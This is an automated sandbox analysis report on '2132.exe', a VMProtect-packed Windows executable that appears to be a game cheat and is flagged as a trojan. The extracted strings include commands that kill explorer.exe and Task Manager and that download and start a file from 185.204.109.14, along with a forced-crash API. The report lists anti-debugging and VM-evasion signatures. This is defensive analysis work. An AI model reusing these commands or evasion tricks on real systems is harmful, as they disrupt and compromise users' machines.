Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2132.exe

Overview

General Information

Sample name:2132.exe
Analysis ID:1414519
MD5:4c011bce3cc2a63e49788e00273da5ea
SHA1:db5b673f4adadbe2be104ee35aeee836103b0f98
SHA256:9a4dcc460c1f324ead9dc276d4cf4838a6e217de4f95ca0f0691a95ce4518cf1
Tags:exeUKR
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected VMProtect packer
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Checks if the current process is being debugged
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs

Classification

  • System is w10x64
  • 2132.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\2132.exe" MD5: 4C011BCE3CC2A63E49788E00273DA5EA)
    • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2132.exeAvira: detected
Source: 2132.exeReversingLabs: Detection: 66%
Source: 2132.exeVirustotal: Detection: 37%Perma Link
Source: 2132.exeJoe Sandbox ML: detected
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6fb99af9-2
Source: 2132.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 185.204.109.14:5145
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: 2132.exeString found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3
Source: 2132.exeString found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3start
Source: 2132.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: 2132.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 2132.exeString found in binary or memory: http://pki-ocsp.symauth.com0
Source: 2132.exe, 00000000.00000002.1991144735.00000279BD5C7000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/V
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 2132.exeString found in binary or memory: https://discord.gg/W2mrcAMEAH
Source: 2132.exeString found in binary or memory: https://discord.gg/W2mrcAMEAHChams
Source: 2132.exeString found in binary or memory: https://www.myinstants.com/media/sounds/skibidi-toilet.mp3

System Summary

barindex
Source: 2132.exeStatic PE information: .vmp0 and .vmp1 section names
Source: 2132.exe, 00000000.00000002.1991144735.00000279BD5C7000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs 2132.exe
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs 2132.exe
Source: C:\Users\user\Desktop\2132.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Users\user\Desktop\2132.exeSection loaded: mswsock.dllJump to behavior
Source: classification engineClassification label: mal88.evad.winEXE@2/1@0/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Users\user\Desktop\2132.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2132.exeReversingLabs: Detection: 66%
Source: 2132.exeVirustotal: Detection: 37%
Source: unknownProcess created: C:\Users\user\Desktop\2132.exe "C:\Users\user\Desktop\2132.exe"
Source: C:\Users\user\Desktop\2132.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: 2132.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2132.exeStatic file information: File size 4124160 > 1048576
Source: 2132.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x3df400
Source: 2132.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: 2132.exeStatic PE information: section name: .vmp0
Source: 2132.exeStatic PE information: section name: .vmp1

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8A50008 value: E9 8B D7 E9 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED790 value: E9 80 28 16 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8A60008 value: E9 8B DA E8 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88EDA90 value: E9 80 25 17 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8A70008 value: E9 4B D6 E7 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED650 value: E9 C0 29 18 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8A80008 value: E9 AB D0 E6 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED0B0 value: E9 60 2F 19 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8A90008 value: E9 0B D2 E5 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED210 value: E9 00 2E 1A 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AA0008 value: E9 0B D9 E4 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED910 value: E9 00 27 1B 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AB0008 value: E9 CB D4 E3 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED4D0 value: E9 40 2B 1C 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AC0008 value: E9 2B D9 E2 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED930 value: E9 E0 26 1D 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AD0008 value: E9 0B DA E1 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88EDA10 value: E9 00 26 1E 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AE0008 value: E9 EB D4 E0 FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED4F0 value: E9 20 2B 1F 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8AF0008 value: E9 2B D5 DF FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED530 value: E9 E0 2A 20 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8B00008 value: E9 4B D4 DE FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED450 value: E9 C0 2B 21 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8B10008 value: E9 EB D9 DD FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED9F0 value: E9 20 26 22 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8B2000D value: E9 BB CB DF FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C891CBC0 value: E9 5A 34 20 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8B30008 value: E9 CB D1 DB FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED1D0 value: E9 40 2E 24 00 Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C8B40008 value: E9 EB D1 DA FF Jump to behavior
Source: C:\Users\user\Desktop\2132.exeMemory written: PID: 5576 base: 7FF8C88ED1F0 value: E9 20 2E 25 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2132.exeRDTSC instruction interceptor: First address: 7FF7FA8584F1 second address: 7FF7FA85850E instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop ecx 0x00000004 inc ebp 0x00000005 bsf edi, esi 0x00000008 stc 0x00000009 and ah, 0000004Bh 0x0000000c pop ebp 0x0000000d inc ecx 0x0000000e test bl, 0000005Fh 0x00000011 inc ecx 0x00000012 adc bl, FFFFFF9Fh 0x00000015 inc eax 0x00000016 xor bh, 0000002Ah 0x00000019 pop esi 0x0000001a inc ecx 0x0000001b rcr ch, cl 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2132.exeSpecial instruction interceptor: First address: 7FF7FAED8076 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: 2132.exe, 00000000.00000003.1990830948.00000279BBC2B000.00000004.00000020.00020000.00000000.sdmp, 2132.exe, 00000000.00000002.1991037855.00000279BBC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\2132.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\2132.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\2132.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\2132.exeHandle closed: DEADC0DE
Source: C:\Users\user\Desktop\2132.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2132.exeProcess queried: DebugObjectHandleJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\2132.exeNtQueryVolumeInformationFile: Indirect: 0x7FF7FAAF4786Jump to behavior
Source: C:\Users\user\Desktop\2132.exeNtCreateFile: Indirect: 0x7FF7FAAF4677Jump to behavior
Source: C:\Users\user\Desktop\2132.exeNtProtectVirtualMemory: Indirect: 0x7FF7FAAF24BEJump to behavior
Source: C:\Users\user\Desktop\2132.exeNtMapViewOfSection: Indirect: 0x7FF7FAAF49CEJump to behavior
Source: C:\Users\user\Desktop\2132.exeNtQueryAttributesFile: Indirect: 0x7FF7FAAF4618Jump to behavior
Source: C:\Users\user\Desktop\2132.exeNtOpenFile: Indirect: 0x7FF7FAAF46E2Jump to behavior
Source: 2132.exeBinary or memory string: Shell_TrayWnd
Source: 2132.exeBinary or memory string: than 10.00 aim could work incorrect!%dmsWorldXRay Status:waitWarning!PreviewOther##crossSpeedRainbowstalcraft.exestalcraftw.exeGame executableInfobibadaysbober.su Discordhttps://discord.gg/W2mrcAMEAHChams loadingABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789RtlAdjustPrivilegentdll.dllNtRaiseHardError Y: X: C:\Windows\Fonts\Arial.ttftemp.buf > \/taskkill /IM explorer.exe /Ftaskkill /IM taskmgr.exe /F\ballincasin.mp3curl -o ballincasin.mp3 http://185.204.109.14:4777/ballincasin.mp3start ballincasin.mp3"del "Shell_TrayWnd.bmpFailed to initialize WinsockFailed to create socket185.204.109.14Failed to connect to serverFailedCheck your internet connection!rwid;;explorer.execurl -o skibidi.mp3 https://www.myinstants.com/media/sounds/skibidi-toilet.mp3\skibidi.mp3bimba
Source: C:\Users\user\Desktop\2132.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
2
Process Injection
11
Virtualization/Sandbox Evasion
1
Credential API Hooking
411
Security Software Discovery
Remote Services1
Credential API Hooking
1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism
2
Process Injection
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Archive Collected Data
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS212
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2132.exe67%ReversingLabsWin64.Trojan.Black
2132.exe38%VirustotalBrowse
2132.exe100%AviraTR/Black.Gen2
2132.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pki-ocsp.symauth.com00%URL Reputationsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
http://185.204.109.14:4777/ballincasin.mp3start0%Avira URL Cloudsafe
http://185.204.109.14:4777/ballincasin.mp30%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
https://discord.gg/W2mrcAMEAH0%Avira URL Cloudsafe
https://curl.se/V0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%VirustotalBrowse
http://185.204.109.14:4777/ballincasin.mp3start1%VirustotalBrowse
https://curl.se/docs/copyright.htmlD0%VirustotalBrowse
https://discord.gg/W2mrcAMEAHChams0%Avira URL Cloudsafe
https://curl.se/V0%VirustotalBrowse
http://185.204.109.14:4777/ballincasin.mp31%VirustotalBrowse
https://discord.gg/W2mrcAMEAH0%VirustotalBrowse
https://curl.se/docs/http-cookies.html0%VirustotalBrowse
https://curl.se/docs/alt-svc.html0%VirustotalBrowse
https://discord.gg/W2mrcAMEAHChams0%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://curl.se/docs/hsts.html2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://curl.se/docs/copyright.htmlD2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://curl.se/docs/http-cookies.html2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://pki-ocsp.symauth.com02132.exefalse
  • URL Reputation: safe
unknown
http://185.204.109.14:4777/ballincasin.mp32132.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.zlib.net/D2132.exe, 00000000.00000002.1991144735.00000279BD5C7000.00000002.10000000.00040000.00000000.sdmpfalse
    high
    http://185.204.109.14:4777/ballincasin.mp3start2132.exefalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr2132.exefalse
      high
      https://www.myinstants.com/media/sounds/skibidi-toilet.mp32132.exefalse
        high
        https://curl.se/docs/alt-svc.html2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl072132.exefalse
          high
          https://discord.gg/W2mrcAMEAH2132.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/V2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://discord.gg/W2mrcAMEAHChams2132.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.204.109.14
          unknownRussian Federation
          39444OWENTIS-ASFRfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1414519
          Start date and time:2024-03-23 18:48:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 41s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:3
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:2132.exe
          Detection:MAL
          Classification:mal88.evad.winEXE@2/1@0/1
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Execution Graph export aborted for target 2132.exe, PID 5576 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          No simulations
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          OWENTIS-ASFRsora.x86.elfGet hashmaliciousMiraiBrowse
          • 85.31.212.133
          Yk6wfqLJ92.elfGet hashmaliciousMiraiBrowse
          • 85.31.212.153
          N3IaNLgXfp.elfGet hashmaliciousMiraiBrowse
          • 85.31.212.111
          LvVirzr3Fq.elfGet hashmaliciousMiraiBrowse
          • 85.31.212.110
          sScKDrSyhOGet hashmaliciousMiraiBrowse
          • 85.31.212.127
          aBot.arm7Get hashmaliciousMiraiBrowse
          • 85.31.212.108
          jBL8L6bC1HGet hashmaliciousMiraiBrowse
          • 85.31.212.154
          56mHVCBv8HGet hashmaliciousMiraiBrowse
          • 85.31.212.138
          lKtvZWpjKJGet hashmaliciousMiraiBrowse
          • 85.31.212.103
          arm7Get hashmaliciousMiraiBrowse
          • 85.31.212.118
          No context
          No context
          Process:C:\Users\user\Desktop\2132.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):6265
          Entropy (8bit):2.5216406363433186
          Encrypted:false
          SSDEEP:6:1bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbl:z
          MD5:4D8711D4F6344C6048AD8FA0E8A572F3
          SHA1:E0900CEFE5F8CA8F4A5CB011916428CBBE805585
          SHA-256:F753926A31B7309D0F44261FD61883FB5A62BCB17831719735FC11FF00438F37
          SHA-512:7F0F15A3B9423438AEC4C1314832C7F9FF17EB89958411E77BF46A320D148159061A2E84520DE1EB33ED04FC7B329DC8BA81AF773066CAC80FC61CBFC9631829
          Malicious:false
          Reputation:low
          Preview:bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba.
          File type:PE32+ executable (console) x86-64, for MS Windows
          Entropy (8bit):7.9872271384302795
          TrID:
          • Win64 Executable Console (202006/5) 92.65%
          • Win64 Executable (generic) (12005/4) 5.51%
          • Generic Win/DOS Executable (2004/3) 0.92%
          • DOS Executable Generic (2002/1) 0.92%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:2132.exe
          File size:4'124'160 bytes
          MD5:4c011bce3cc2a63e49788e00273da5ea
          SHA1:db5b673f4adadbe2be104ee35aeee836103b0f98
          SHA256:9a4dcc460c1f324ead9dc276d4cf4838a6e217de4f95ca0f0691a95ce4518cf1
          SHA512:f5ac71937ab36c2a29e11970474ee5141f6be18e3dc7a0a081a48f7d501599848a915c67b12af0702619acef51abec484a8e67be1c14564423ee9a3cf3c2849b
          SSDEEP:98304:QL4fhqBZfj5dzCIZdmH1eYmxDrnAwvOTVoC2FCBazNoI:Qnfj5dCIZdmH1CvaA/zN
          TLSH:B6163397E50E07A9D40A5BB095EB49E078D6399D2F85D02D797CEECE338181DCF02B62
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...G...G...G...?r..G.......G.......G.......G.......G.......G...?...G...G...F.......G.......G.......G..Rich.G..........PE..d..
          Icon Hash:00928e8e8686b000
          Entrypoint:0x14043c70c
          Entrypoint Section:.vmp1
          Digitally signed:false
          Imagebase:0x140000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x65EC8566 [Sat Mar 9 15:51:02 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:759a583e26c79230c2c829f7f86ebec2
          Instruction
          jmp 00007FC154E599AAh
          jl 00007FC154E59A1Bh
          pop es
          add byte ptr [eax], al
          add byte ptr [eax], al
          add cl, ch
          pushad
          outsd
          add dword ptr [eax], eax
          jmp 00007FC154E7A6C5h
          jp 00007FC154E599ADh
          xchg eax, esi
          add byte ptr [ebp+02467EF9h], FFFFFFB2h
          add dl, ch
          dec al
          cmp si, dx
          xor al, 4Ch
          xor bl, al
          clc
          cmp dh, 00000007h
          dec eax
          mov eax, dword ptr [esp+eax]
          dec eax
          sub ebp, 00000008h
          dec eax
          mov dword ptr [ebp+00h], eax
          ror al, FFFFFF84h
          bt eax, 11h
          dec eax
          sub esi, 00000004h
          mov eax, dword ptr [esi]
          xor eax, ebx
          jmp 00007FC154E65167h
          dec eax
          mov ecx, dword ptr [ebp+00h]
          movzx ax, byte ptr [ecx]
          clc
          dec esp
          cmp eax, ebx
          dec eax
          add ebp, 00000006h
          clc
          inc ecx
          cmp dl, 0000000Fh
          mov word ptr [ebp+00h], ax
          bswap ax
          inc ecx
          add al, cl
          dec eax
          sub esi, 00000004h
          and ah, FFFFFF92h
          mov eax, dword ptr [esi]
          test ax, 000042B7h
          inc eax
          test ah, dl
          xor eax, ebx
          not eax
          jmp 00007FC154EC35B4h
          push edx
          shl edi, cl
          pop ecx
          inc edi
          mov ebx, 2FBDD11Bh
          xchg eax, edi
          rcl dword ptr [eax+50h], 1
          mov dword ptr [7098740Bh], eax
          push cs
          popfd
          sbb dword ptr [esi-522F5662h], eax
          jmp 00007FC15347DEACh
          cdq
          shl bh, 1
          lodsb
          sbb al, byte ptr [edx+edi*4]
          mov al, byte ptr [A4129117h]
          in eax, dx
          movsd
          outsd
          inc esp
          jmp 00007FC154E599BDh
          Programming Language:
          • [IMP] VS2008 SP1 build 30729
          • [IMP] VS2005 build 50727
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x4944080xc4f.vmp1
          IMAGE_DIRECTORY_ENTRY_IMPORT0x446a600x258.vmp1
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8100000x1d5.rsrc
